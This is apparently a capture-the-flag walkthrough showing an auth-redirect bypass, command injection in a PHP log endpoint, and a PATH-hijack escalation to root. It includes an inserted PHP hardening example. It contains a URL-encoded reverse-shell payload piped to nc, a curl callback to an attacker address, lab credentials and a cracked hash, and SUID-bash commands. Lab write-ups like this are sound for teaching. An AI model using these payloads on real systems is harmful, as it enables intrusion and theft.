OK, we have 2 open ports: 22 and 80.
Let's check port 80 first…
The first thing we found was a login page, so I tried the default creds `admin:admin`,
but that didn't work.
So I started directory brute-forcing and found that all dirs redirect me to the login page.
So I opened Burp Suite and intercepted the traffic before the redirect, and found that the server loads the page content and then redirects me; if I change the status code to 200, I can access the pages.
I accessed all the pages this way and enumerated the website…
What I found was a `sitebackup.zip`, and we all know what that means xD … the source code for the site.
I downloaded it and started checking some files like `config.php` and `logs.php`.
Here I found that one PHP file uses `exec` to run another script on the system and doesn't validate the input at all.
We can reach this function with a request to `/file_logs.php`, choose any delim, and intercept the request with Burp.
So I created my payload to check for RCE: started `nc -nlvp 1234` on my machine, then from Burp sent a request that fetches a file from my system.
`delim=comma%26curl+http://10.10.16.3:1234` and good, it's accepted: `200 OK`
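The bug behind this is the classic shell-injection pattern: user input concatenated straight into an `exec` string. As an added example (not the box's own `file_logs.php`, whose exact code I don't have), this is how the delim handling should have looked: the client sends a *name* that is looked up in a fixed allowlist, and the resolved value goes through `escapeshellarg`, so `comma&curl ...` is rejected before anything reaches the shell. The script path, parameter name and delimiter set are assumptions.

```php
<?php
// Added example: hardened delim handling for a log-export endpoint.
// Script path, parameter name and delimiter set are assumptions for illustration.

// Vulnerable pattern (what the writeup describes): raw input glued into the command.
//   exec("/opt/scripts/log_process.sh " . $_REQUEST['delim']);
//   -> "delim=comma&curl http://..." makes the shell run curl as www-data.

// Map the name the client may send to the actual delimiter character.
// The client never controls the string that reaches the shell.
const ALLOWED_DELIMS = [
    'comma' => ',',
    'space' => ' ',
    'tab'   => "\t",
];

function resolveDelim(string $delim): ?string
{
    // Exact-key lookup: "comma&curl ..." is simply not a key, so it resolves to null.
    return ALLOWED_DELIMS[$delim] ?? null;
}

function buildLogCommand(string $delim): ?string
{
    $char = resolveDelim($delim);
    if ($char === null) {
        return null;
    }
    // escapeshellarg is defence in depth: even if the allowlist later grows to
    // include shell metacharacters, the value is passed as one quoted argument.
    return '/opt/scripts/log_process.sh ' . escapeshellarg($char);
}

if (PHP_SAPI === 'cli') {
    // Quick self-check when run from the command line.
    var_dump(buildLogCommand('comma'));                              // "/opt/scripts/log_process.sh ','"
    var_dump(buildLogCommand('comma&curl http://10.10.16.3:1234'));  // NULL
    exit;
}

// Web request handling (hypothetical endpoint layout).
$cmd = buildLogCommand((string)($_REQUEST['delim'] ?? 'comma'));
if ($cmd === null) {
    http_response_code(400);
    exit('invalid delim');
}
exec($cmd, $output, $rc);
echo implode("\n", $output);
```

Running the script from the CLI (`php file_logs_hardened.php`) prints the safe command for `comma` and `NULL` for the injected value, which is what the 400 branch would return to Burp.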
Access [m4lwhere] user
So I made my payload to get a reverse shell -> `comma%26rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Cbash%20-i%202>%261%7Cnc%2010.10.16.3%204444%20>/tmp/f`
OK, we have a reverse shell as `www-data`. Using the credentials we found before in `config.php`, I ran mysql to check the databases.
`echo "mySQL_p@ssw0rd!:)" | mysql -u root -p` and started interacting with the database.
Now we have the `m4lwhere` password hash: `$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.`
Crack it using hashcat or john:
`hashcat -a 0 -m 500 hash /usr/share/wordlists/rockyou.txt`
`john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash`
We got the password `ilovecody112235!`, so we can now connect over SSH with this user's creds.
Privilege Escalation
We got this script that we can run as root, but we cannot edit it.
- If we read the script carefully we can see that it uses the `date` command, so we can override this command with our own code.
```
bash-4.4$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > date
bash-4.4$ chmod 777 date
bash-4.4$ export PATH=/tmp:$PATH
bash-4.4$ sudo /opt/scripts/access_backup.sh
```
1) In the first line we write a command that copies `/bin/bash` and changes the copy's permissions (sets the SUID bit) into a file called `date`.
2) In the second line we change the file's permissions to make it executable by anyone.
3) In the third line we add the file's directory to the beginning of `PATH`,
so when the script runs `date`, it executes our file instead of the real command.
4) We run the privileged script with sudo and wait for it.
And ….
The last step is to check for the file we copied.
Congrats!!! You are root now….